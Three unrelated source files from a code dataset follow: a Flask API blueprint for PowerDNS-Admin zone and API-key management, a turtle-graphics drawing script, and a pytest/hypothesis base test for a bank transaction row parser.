{"seq_id":"89432561","text":"import json\nfrom flask import Blueprint, g, request, abort\nfrom app.models import Domain, History, Setting, ApiKey\nfrom app.lib import utils, helper\nfrom app.decorators import api_basic_auth, api_can_create_domain, is_json\nfrom app.decorators import apikey_auth, apikey_is_admin\nfrom app.decorators import apikey_can_access_domain\nfrom app import csrf\nfrom app.errors import DomainNotExists, DomainAccessForbidden, RequestIsNotJSON\nfrom app.errors import ApiKeyCreateFail, ApiKeyNotUsable, NotEnoughPrivileges\nfrom app.schema import ApiKeySchema, DomainSchema, ApiPlainKeySchema\nfrom urllib.parse import urljoin\nfrom app.lib.log import logging\n\napi_blueprint = Blueprint('api_blueprint', __name__)\n\napikey_schema = ApiKeySchema(many=True)\ndomain_schema = DomainSchema(many=True)\napikey_plain_schema = ApiPlainKeySchema(many=True)\n\n\n@api_blueprint.errorhandler(400)\ndef handle_400(err):\n    return json.dumps({\"msg\": \"Bad Request\"}), 400\n\n\n@api_blueprint.errorhandler(401)\ndef handle_401(err):\n    return json.dumps({\"msg\": \"Unauthorized\"}), 401\n\n\n@api_blueprint.errorhandler(500)\ndef handle_500(err):\n    return json.dumps({\"msg\": \"Internal Server Error\"}), 500\n\n\n@api_blueprint.errorhandler(DomainNotExists)\ndef handle_domain_not_exists(err):\n    return json.dumps(err.to_dict()), err.status_code\n\n\n@api_blueprint.errorhandler(DomainAccessForbidden)\ndef handle_domain_access_forbidden(err):\n    return json.dumps(err.to_dict()), err.status_code\n\n\n@api_blueprint.errorhandler(ApiKeyCreateFail)\ndef handle_apikey_create_fail(err):\n    return json.dumps(err.to_dict()), err.status_code\n\n\n@api_blueprint.errorhandler(ApiKeyNotUsable)\ndef handle_apikey_not_usable(err):\n    return json.dumps(err.to_dict()), err.status_code\n\n\n@api_blueprint.errorhandler(NotEnoughPrivileges)\ndef handle_not_enough_privileges(err):\n    return json.dumps(err.to_dict()), err.status_code\n\n\n@api_blueprint.errorhandler(RequestIsNotJSON)\ndef handle_request_is_not_json(err):\n    return json.dumps(err.to_dict()), err.status_code\n\n\n@api_blueprint.before_request\n@is_json\ndef before_request():\n    pass\n\n\n@csrf.exempt\n@api_blueprint.route('/pdnsadmin/zones', methods=['POST'])\n@api_basic_auth\n@api_can_create_domain\ndef api_login_create_zone():\n    pdns_api_url = Setting().get('pdns_api_url')\n    pdns_api_key = Setting().get('pdns_api_key')\n    pdns_version = Setting().get('pdns_version')\n    api_uri_with_prefix = utils.pdns_api_extended_uri(pdns_version)\n    api_full_uri = api_uri_with_prefix + '/servers/localhost/zones'\n    headers = {}\n    headers['X-API-Key'] = pdns_api_key\n\n    msg_str = \"Sending request to powerdns API {0}\"\n    msg = msg_str.format(request.get_json(force=True))\n    logging.debug(msg)\n\n    resp = utils.fetch_remote(\n
        urljoin(pdns_api_url, api_full_uri),\n        method='POST',\n        data=request.get_json(force=True),\n        headers=headers,\n        accept='application/json; q=1'\n    )\n\n    if resp.status_code == 201:\n        logging.debug(\"Request to powerdns API successful\")\n        data = request.get_json(force=True)\n\n        history = History(\n            msg='Add domain {0}'.format(data['name'].rstrip('.')),\n            detail=json.dumps(data),\n            created_by=g.user.username\n        )\n        history.add()\n\n        if g.user.role.name not in ['Administrator', 'Operator']:\n            logging.debug(\"User is ordinary user, assigning created domain\")\n            domain = Domain(name=data['name'].rstrip('.'))\n            domain.update()\n            domain.grant_privileges([g.user.username])\n\n        domain = Domain()\n        domain.update()\n\n    # Return the PowerDNS response for non-201 results as well.\n    return resp.content, resp.status_code, resp.headers.items()\n\n\n@csrf.exempt\n@api_blueprint.route('/pdnsadmin/zones', methods=['GET'])\n@api_basic_auth\ndef api_login_list_zones():\n    if g.user.role.name not in ['Administrator', 'Operator']:\n        domain_obj_list = g.user.get_domains()\n    else:\n        domain_obj_list = Domain.query.all()\n\n    domain_obj_list = [] if domain_obj_list is None else domain_obj_list\n    return json.dumps(domain_schema.dump(domain_obj_list)), 200\n\n\n@csrf.exempt\n@api_blueprint.route(\n    '/pdnsadmin/zones/<string:domain_name>',\n    methods=['DELETE']\n)\n@api_basic_auth\n@api_can_create_domain\ndef api_login_delete_zone(domain_name):\n    pdns_api_url = Setting().get('pdns_api_url')\n    pdns_api_key = Setting().get('pdns_api_key')\n    pdns_version = Setting().get('pdns_version')\n    api_uri_with_prefix = utils.pdns_api_extended_uri(pdns_version)\n    api_full_uri = api_uri_with_prefix + '/servers/localhost/zones'\n    api_full_uri += '/' + domain_name\n    headers = {}\n    headers['X-API-Key'] = pdns_api_key\n\n    domain = Domain.query.filter(Domain.name == domain_name)\n\n    if not domain:\n        abort(404)\n\n    if g.user.role.name not in ['Administrator', 'Operator']:\n        user_domains_obj_list = g.user.get_domains()\n        user_domains_list = [item.name for item in user_domains_obj_list]\n\n        if domain_name not in user_domains_list:\n            raise DomainAccessForbidden()\n\n    msg_str = \"Sending request to powerdns API {0}\"\n    logging.debug(msg_str.format(domain_name))\n\n    try:\n        resp = utils.fetch_remote(\n            urljoin(pdns_api_url, api_full_uri),\n            method='DELETE',\n            headers=headers,\n            accept='application/json; q=1'\n        )\n\n        if resp.status_code == 204:\n            logging.debug(\"Request to powerdns API successful\")\n\n            history = History(\n                msg='Delete domain {0}'.format(domain_name),\n                detail='',\n                created_by=g.user.username\n            )\n            history.add()\n\n            domain = Domain()\n            domain.update()\n    except Exception as e:\n        logging.error('Error: {0}'.format(e))\n        abort(500)\n\n    return resp.content, resp.status_code, resp.headers.items()\n\n\n@csrf.exempt\n@api_blueprint.route('/pdnsadmin/apikeys', methods=['POST'])\n@api_basic_auth\ndef api_generate_apikey():\n    data = request.get_json()\n    description = None\n    role_name = None\n    apikey = None\n    domain_obj_list = []\n\n    abort(400) if 'domains' not in data else None\n    abort(400) if not isinstance(data['domains'], (list,)) else None\n    abort(400) if 'role' not in data else None\n\n    description = data['description'] if 'description' in data else None\n    role_name = data['role']\n    domains = data['domains']\n\n    if role_name == 'User' and len(domains) == 0:\n        logging.error(\"Apikey with User role must have domains\")\n        raise ApiKeyNotUsable()\n    elif role_name == 'User':\n        domain_obj_list = Domain.query.filter(Domain.name.in_(domains)).all()\n        if len(domain_obj_list) == 0:\n            msg = \"One of the supplied domains does not exist\"\n            logging.error(msg)\n
            raise DomainNotExists(message=msg)\n\n    if g.user.role.name not in ['Administrator', 'Operator']:\n        # A domain-scoped api key may only reference domains the user can\n        # access, and a plain user may not assign any role above 'User'.\n        if role_name != 'User':\n            msg = \"User cannot assign other role than User\"\n            logging.error(msg)\n            raise NotEnoughPrivileges(message=msg)\n\n        user_domain_obj_list = g.user.get_domains()\n\n        domain_list = [item.name for item in domain_obj_list]\n        user_domain_list = [item.name for item in user_domain_obj_list]\n\n        logging.debug(\"Input domain list: {0}\".format(domain_list))\n        logging.debug(\"User domain list: {0}\".format(user_domain_list))\n\n        inter = set(domain_list).intersection(set(user_domain_list))\n\n        if not (len(inter) == len(domain_list)):\n            msg = \"You don't have access to one of domains\"\n            logging.error(msg)\n            raise DomainAccessForbidden(message=msg)\n\n    apikey = ApiKey(\n        desc=description,\n        role_name=role_name,\n        domains=domain_obj_list\n    )\n\n    try:\n        apikey.create()\n    except Exception as e:\n        logging.error('Error: {0}'.format(e))\n        raise ApiKeyCreateFail(message='Api key create failed')\n\n    return json.dumps(apikey_plain_schema.dump([apikey])), 201\n\n\n@csrf.exempt\n@api_blueprint.route('/pdnsadmin/apikeys', defaults={'domain_name': None})\n@api_blueprint.route('/pdnsadmin/apikeys/<string:domain_name>')\n@api_basic_auth\ndef api_get_apikeys(domain_name):\n    apikeys = []\n    logging.debug(\"Getting apikeys\")\n\n    if g.user.role.name not in ['Administrator', 'Operator']:\n        if domain_name:\n            msg = \"Check if domain {0} exists and is allowed for user.\".format(domain_name)\n            logging.debug(msg)\n            apikeys = g.user.get_apikeys(domain_name)\n\n            if not apikeys:\n                raise DomainAccessForbidden(name=domain_name)\n\n            logging.debug(apikey_schema.dump(apikeys))\n        else:\n            msg_str = \"Getting all allowed domains for user {0}\"\n            msg = msg_str.format(g.user.username)\n
            logging.debug(msg)\n\n            try:\n                apikeys = g.user.get_apikeys()\n                logging.debug(apikey_schema.dump(apikeys))\n            except Exception as e:\n                logging.error('Error: {0}'.format(e))\n                abort(500)\n    else:\n        logging.debug(\"Getting all domains for administrative user\")\n        try:\n            apikeys = ApiKey.query.all()\n            logging.debug(apikey_schema.dump(apikeys))\n        except Exception as e:\n            logging.error('Error: {0}'.format(e))\n            abort(500)\n\n    return json.dumps(apikey_schema.dump(apikeys)), 200\n\n\n@csrf.exempt\n@api_blueprint.route('/pdnsadmin/apikeys/<int:apikey_id>', methods=['DELETE'])\n@api_basic_auth\ndef api_delete_apikey(apikey_id):\n    apikey = ApiKey.query.get(apikey_id)\n\n    if not apikey:\n        abort(404)\n\n    logging.debug(g.user.role.name)\n\n    if g.user.role.name not in ['Administrator', 'Operator']:\n        apikeys = g.user.get_apikeys()\n        user_domains_obj_list = g.user.get_domain().all()\n        apikey_domains_obj_list = apikey.domains\n        user_domains_list = [item.name for item in user_domains_obj_list]\n        apikey_domains_list = [item.name for item in apikey_domains_obj_list]\n        apikeys_ids = [apikey_item.id for apikey_item in apikeys]\n\n        inter = set(apikey_domains_list).intersection(set(user_domains_list))\n\n        if not (len(inter) == len(apikey_domains_list)):\n            msg = \"You don't have access to some domains apikey belongs to\"\n            logging.error(msg)\n            raise DomainAccessForbidden(message=msg)\n\n        if apikey_id not in apikeys_ids:\n            raise DomainAccessForbidden()\n\n    try:\n        apikey.delete()\n    except Exception as e:\n        logging.error('Error: {0}'.format(e))\n        abort(500)\n\n    return '', 204\n\n\n@csrf.exempt\n@api_blueprint.route('/pdnsadmin/apikeys/<int:apikey_id>', methods=['PUT'])\n@api_basic_auth\ndef api_update_apikey(apikey_id):\n    # Update the role if it changed and the user may change it, and update\n    # the apikey domains if they changed and the user may manage them.\n    data = request.get_json()\n    description = data['description'] if 'description' in data else None\n    role_name = data['role'] if 'role' in data else None\n    domains = data['domains'] if 'domains' in data else None\n    domain_obj_list = None\n\n    apikey = ApiKey.query.get(apikey_id)\n\n    if not apikey:\n        abort(404)\n\n    logging.debug('Updating apikey with id {0}'.format(apikey_id))\n\n    # 'domains' may be missing from the request entirely, so guard against\n    # None before checking the length.\n    if role_name == 'User' and not domains:\n        logging.error(\"Apikey with User role must have domains\")\n        raise ApiKeyNotUsable()\n    elif role_name == 'User':\n        domain_obj_list = Domain.query.filter(Domain.name.in_(domains)).all()\n        if len(domain_obj_list) == 0:\n            msg = \"One of the supplied domains does not exist\"\n            logging.error(msg)\n            raise DomainNotExists(message=msg)\n\n    if g.user.role.name not in ['Administrator', 'Operator']:\n        if role_name != 'User':\n            msg = \"User cannot assign other role than User\"\n            logging.error(msg)\n            raise NotEnoughPrivileges(message=msg)\n\n        apikeys = g.user.get_apikeys()\n        apikey_domains = [item.name for item in apikey.domains]\n        apikeys_ids = [apikey_item.id for apikey_item in apikeys]\n\n        user_domain_obj_list = g.user.get_domain().all()\n\n        domain_list = [item.name for item in domain_obj_list]\n        user_domain_list = [item.name for item in user_domain_obj_list]\n\n        logging.debug(\"Input domain list: {0}\".format(domain_list))\n        logging.debug(\"User domain list: {0}\".format(user_domain_list))\n\n        inter = set(domain_list).intersection(set(user_domain_list))\n\n        if not (len(inter) == len(domain_list)):\n            msg = \"You don't have access to one of domains\"\n            logging.error(msg)\n            raise DomainAccessForbidden(message=msg)\n
\n        if apikey_id not in apikeys_ids:\n            msg = 'Apikey does not belong to domain to which user has access'\n            logging.error(msg)\n            raise DomainAccessForbidden()\n\n    apikey_domains = [item.name for item in apikey.domains]\n    # Guard the comparison so a request without 'domains' (None) does not\n    # crash a description-only update.\n    if domains is not None and set(domains) == set(apikey_domains):\n        logging.debug(\"Domains are same, apikey domains won't be updated\")\n        domains = None\n\n    if role_name == apikey.role:\n        logging.debug(\"Role is same, apikey role won't be updated\")\n        role_name = None\n\n    if description == apikey.description:\n        msg = \"Description is same, apikey description won't be updated\"\n        logging.debug(msg)\n        description = None\n\n    try:\n        apikey = ApiKey.query.get(apikey_id)\n        apikey.update(\n            role_name=role_name,\n            domains=domains,\n            description=description\n        )\n    except Exception as e:\n        logging.error('Error: {0}'.format(e))\n        abort(500)\n\n    return '', 204\n\n\n@csrf.exempt\n@api_blueprint.route(\n    '/servers/<string:server_id>/zones/<string:zone_id>/<path:subpath>',\n    methods=['GET', 'POST', 'PUT', 'PATCH', 'DELETE']\n)\n@apikey_auth\n@apikey_can_access_domain\ndef api_zone_subpath_forward(server_id, zone_id, subpath):\n    resp = helper.forward_request()\n    return resp.content, resp.status_code, resp.headers.items()\n\n\n@csrf.exempt\n@api_blueprint.route(\n    '/servers/<string:server_id>/zones/<string:zone_id>',\n    methods=['GET', 'PUT', 'PATCH', 'DELETE']\n)\n@apikey_auth\n@apikey_can_access_domain\ndef api_zone_forward(server_id, zone_id):\n    resp = helper.forward_request()\n    domain = Domain()\n    domain.update()\n    return resp.content, resp.status_code, resp.headers.items()\n\n\n@api_blueprint.route(\n    '/servers',\n    methods=['GET']\n)\n@apikey_auth\n@apikey_is_admin\ndef api_server_forward():\n    resp = helper.forward_request()\n    return resp.content, resp.status_code, resp.headers.items()\n\n\n@api_blueprint.route(\n    '/servers/<path:subpath>',\n    methods=['GET', 'PUT']\n)\n@apikey_auth\n@apikey_is_admin\ndef api_server_sub_forward(subpath):\n    resp = helper.forward_request()\n    return resp.content, resp.status_code, resp.headers.items()\n\n\n@csrf.exempt\n@api_blueprint.route('/servers/<string:server_id>/zones', methods=['POST'])\n@apikey_auth\ndef api_create_zone(server_id):\n    resp = helper.forward_request()\n\n    if resp.status_code == 201:\n        logging.debug(\"Request to powerdns API successful\")\n        data = request.get_json(force=True)\n\n        history = History(\n            msg='Add domain {0}'.format(data['name'].rstrip('.')),\n            detail=json.dumps(data),\n            created_by=g.apikey.description\n        )\n        history.add()\n\n        if g.apikey.role.name not in ['Administrator', 'Operator']:\n            logging.debug(\"Apikey is user key, assigning created domain\")\n            domain = Domain(name=data['name'].rstrip('.'))\n            g.apikey.domains.append(domain)\n\n        domain = Domain()\n        domain.update()\n\n    # Return the PowerDNS response for non-201 results as well.\n    return resp.content, resp.status_code, resp.headers.items()\n\n\n@csrf.exempt\n@api_blueprint.route('/servers/<string:server_id>/zones', methods=['GET'])\n@apikey_auth\ndef api_get_zones(server_id):\n    if g.apikey.role.name not in ['Administrator', 'Operator']:\n        domain_obj_list = g.apikey.domains\n    else:\n        domain_obj_list = Domain.query.all()\n    return json.dumps(domain_schema.dump(domain_obj_list)), 200\n\n# Endpoint to synchronize domains in the background.\n@csrf.exempt\n@api_blueprint.route('/sync_domains', methods=['GET'])\n@apikey_auth\ndef sync_domains():\n    domain = Domain()\n    domain.update()\n    return 'Finished synchronization in background', 200\n","sub_path":"app/blueprints/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":16566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"587154165","text":"import turtle\n\ntriangleLength = 300\ntriangleAngle = 120\nsquareLength = 300\nsquareAngle = 90\nsquareColor = 'red'\ntriangleColor = 'green'\nbgColor = 'blue'\n\n\nturtle.bgcolor(bgColor)\n\n#build a green triangle\nturtle.penup()\nturtle.goto(-150,100)\nturtle.fillcolor(triangleColor)\nturtle.begin_fill()\nturtle.pendown()\n\nfor i in range(3):\n    turtle.forward(triangleLength)\n    turtle.left(triangleAngle)\n\nturtle.end_fill()\n\n#build a red square\nturtle.penup()\nturtle.fillcolor(squareColor)\nturtle.begin_fill()\nturtle.pendown()\n\nturtle.left(270)\nfor x in range(4):\n    turtle.forward(squareLength)\n    turtle.left(squareAngle)\n\nturtle.end_fill()\n\nturtle.exitonclick()","sub_path":"turtleTriangle.py","file_name":"turtleTriangle.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"194944108","text":"# -*- coding:utf-8 -*-\nfrom datetime import date\n\nimport pytest\nfrom hypothesis import given\nfrom hypothesis.strategies import dates, one_of, decimals, integers, just\n\nfrom bank_merge.common import TransactionType\n\n\nclass BaseTest:\n\n    def _prepare_row(self, transaction_time, transaction_type, amount, from_account, to_account):\n        raise NotImplementedError()\n\n    def _get_parser(self):\n        raise NotImplementedError()\n\n    @given(\n        transaction_time=dates(min_value=date(1001, 1, 1), max_value=date(2999, 1, 1)),\n        transaction_type=one_of(*[just(variant) for variant in TransactionType]),\n        amount=decimals(min_value=0, allow_nan=False, allow_infinity=False),\n        from_account=integers(min_value=0),\n        to_account=integers(min_value=0),\n    )\n    def test_parse_row__ok(self, transaction_time, transaction_type, amount, from_account, to_account):\n        row = self._prepare_row(transaction_time, transaction_type, amount, from_account, to_account)\n        parsed_row = self._get_parser()(row)\n\n        assert parsed_row.date == transaction_time\n        assert parsed_row.transaction_type == transaction_type\n        assert parsed_row.amount == amount\n        assert parsed_row.from_account == from_account\n        assert parsed_row.to_account == to_account\n\n    @pytest.mark.parametrize(\n        'row',\n        [\n            ['05 October 2011 14:48 UTC', 'remove', '0.99999999999999999961033714813378812947', '7163', '28568'],\n            ['Feb 28 1996', 'delete', '0.610440886', '2566321103514746383', '7163'],\n            ['Mar 12 7902', 'remove', '5.23x10', '28214', '32'],\n            ['Mar 12 7902', 'remove', '0.0047832405', '3sd3', '32'],\n            ['Mar 12 7902', 'remove', '0.9999394527', '28214', 'fffa'],\n        ]\n    )\n    def test_parse_row__err(self, row):\n        with pytest.raises(Exception):\n            self._get_parser()(row)\n
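\n# Sketch of a concrete subclass (illustrative; 'CsvParser' and the row layout\n# are assumptions, not part of this test base):\n#\n#     class TestCsvParser(BaseTest):\n#         def _prepare_row(self, transaction_time, transaction_type, amount,\n#                          from_account, to_account):\n#             return [transaction_time.isoformat(), transaction_type.value,\n#                     str(amount), str(from_account), str(to_account)]\n#\n#         def _get_parser(self):\n#             return CsvParser().parse_row\n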
","sub_path":"tests/parsers/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}